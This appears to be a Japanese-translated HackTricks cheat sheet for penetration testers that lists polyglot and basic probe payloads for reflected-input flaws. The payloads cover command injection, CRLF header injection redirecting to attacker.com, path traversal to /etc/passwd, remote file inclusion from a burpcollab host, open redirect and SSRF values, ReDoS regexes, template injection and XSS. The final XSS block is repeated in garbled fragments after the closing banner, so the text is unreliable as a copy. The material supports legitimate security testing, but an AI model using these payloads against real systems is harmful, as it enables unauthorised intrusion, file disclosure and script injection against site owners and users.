# Reflecting Techniques - PoCs and Polygloths CheatSheet {{#include ../../banners/hacktricks-training.md}} これらのPoCとポリグロスの目的は、テスターに**応答に何らかの形で反映される入力**を利用して悪用できる脆弱性の迅速な**概要**を提供することです。 > [!WARNING] > この**チートシートは各脆弱性の包括的なテストリストを提案していません**、基本的なものだけです。より包括的なテストを探している場合は、提案された各脆弱性にアクセスしてください。 > [!CAUTION] > **XXEのようなContent-Type依存のインジェクションは見つかりません**、通常、XMLデータを送信するリクエストを見つけた場合は自分で試すことになります。また、**データベースインジェクションもここには見つかりません**、いくつかのコンテンツが反映される可能性があっても、それはバックエンドDB技術と構造に大きく依存します。 ## Polygloths list ```python {{7*7}}[7*7] 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ %0d%0aLocation:%20http://attacker.com %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E THIS IS AND INJECTED TITLE /etc/passwd ../../../../../../etc/hosts ..\..\..\..\..\..\etc/hosts /etc/hostname ../../../../../../etc/hosts C:/windows/system32/drivers/etc/hosts ../../../../../../windows/system32/drivers/etc/hosts ..\..\..\..\..\..\windows/system32/drivers/etc/hosts http://asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php www.whitelisted.com www.whitelisted.com.evil.com https://google.com //google.com javascript:alert(1) (\\w*)+$ ([a-zA-Z]+)*$ ((a+)+)+$ x=>alert(/Chrome%20XSS%20filter%20bypass/);> {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\ " onclick=alert() a=" '"> javascript:alert() javascript:"/*'/*`/*--> -->'"/> ">>" >|\>@gmail.com'-->" >">'"> " onclick=alert(1)// */ alert(1)// ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> ``` ## [クライアントサイドテンプレートインジェクション](../client-side-template-injection-csti.md) ### 基本テスト ``` {{7*7}} [7*7] ``` ### ポリグロス ```bash {{7*7}}[7*7] ``` ## [コマンドインジェクション](../command-injection.md) ### 基本テスト ```bash ;ls ||ls; |ls; &&ls; &ls; %0Als `ls` $(ls) ``` ### ポリグロス ```bash 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS} /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/ ``` ## [CRLF](../crlf-0d-0a.md) ### 基本テスト ```bash %0d%0aLocation:%20http://attacker.com %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E ``` ## ダングリングマークアップ ### 基本テスト ```markup THIS IS AND INJECTED TITLE ``` ## [ファイルインクルージョン/パストラバーサル](../file-inclusion/) ### 基本テスト ```bash /etc/passwd ../../../../../../etc/hosts ..\..\..\..\..\..\etc/hosts /etc/hostname ../../../../../../etc/hosts C:/windows/system32/drivers/etc/hosts ../../../../../../windows/system32/drivers/etc/hosts ..\..\..\..\..\..\windows/system32/drivers/etc/hosts http://asdasdasdasd.burpcollab.com/mal.php \\asdasdasdasd.burpcollab.com/mal.php ``` ## [オープンリダイレクト](../open-redirect.md) / [サーバーサイドリクエストフォージェリ](../ssrf-server-side-request-forgery/) ### 基本テスト ```bash www.whitelisted.com www.whitelisted.com.evil.com https://google.com //google.com javascript:alert(1) ``` ## [ReDoS](../regular-expression-denial-of-service-redos.md) ### 基本テスト ```bash (\\w*)+$ ([a-zA-Z]+)*$ ((a+)+)+$ ``` ## [サーバーサイドインクルージョン/エッジサイドインクルージョン](../server-side-inclusion-edge-side-inclusion-injection.md) ### 基本テスト ```markup x=>alert(/Chrome%20XSS%20filter%20bypass/);> ``` ### ポリグロス ```markup x=>alert(/Chrome%20XSS%20filter%20bypass/);> ``` ## [サーバーサイドリクエストフォージェリ](../ssrf-server-side-request-forgery/) Open Redirectで使用されるのと同じテストがここでも使用できます。 ## [サーバーサイドテンプレートインジェクション](../ssti-server-side-template-injection/) ### 基本テスト ```markup ${{<%[%'"}}%\ {{7*7}} ${7*7} <%= 7*7 %> ${{7*7}} #{7*7} ``` ### ポリグロス ```python {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\ ``` ## [XSLT サーバーサイドインジェクション](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md) ### 基本テスト ```markup ``` ### ポリグロス ```markup ``` ## XSS ### 基本テスト ```markup " onclick=alert() a=" '"> javascript:alert() ``` ### ポリグロス ```markup javascript:"/*'/*`/*--> -->'"/> jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e ">>" >|\>@gmail.com'-->" >">'"> " onclick=alert(1)// */ alert(1)// ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> javascript://'/-->*/alert()/* javascript://-->"/*/a javascript://"/*// javascript://-->*/alert()/* javascript://'//" -->*/alert()/* javascript://*/alert()/* -->"/*/alert()/* /*/alert()/* javascript://-->*/alert()/* -->'"/> javascript:"/*\"/*`/*' /*--> javascript:`//"//\"//` %0ajavascript:`/*\"/*--><svg onload='/*` javascript:/*--> javascript:"/*'/*`/*--> ``` {{#include ../../banners/hacktricks-training.md}}
*/alert()/* javascript://-->"/*/a javascript://"/*// javascript://-->*/alert()/* javascript://'//" -->*/alert()/* javascript://*/alert()/* -->"/*/alert()/* /*/alert()/* javascript://-->*/alert()/* -->'"/> javascript:"/*\"/*`/*' /*--> javascript:`//"//\"//` %0ajavascript:`/*\"/*--><svg onload='/*` javascript:/*--> javascript:"/*'/*`/*--> ``` {{#include ../../banners/hacktricks-training.md}}
*/alert()/* javascript://-->*/alert()/* -->'"/> javascript:"/*\"/*`/*' /*--> javascript:`//"//\"//` %0ajavascript:`/*\"/*--><svg onload='/*` javascript:/*--> javascript:"/*'/*`/*--> ``` {{#include ../../banners/hacktricks-training.md}}
*/alert()/* -->'"/> javascript:"/*\"/*`/*' /*--> javascript:`//"//\"//` %0ajavascript:`/*\"/*--><svg onload='/*` javascript:/*--> javascript:"/*'/*`/*--> ``` {{#include ../../banners/hacktricks-training.md}}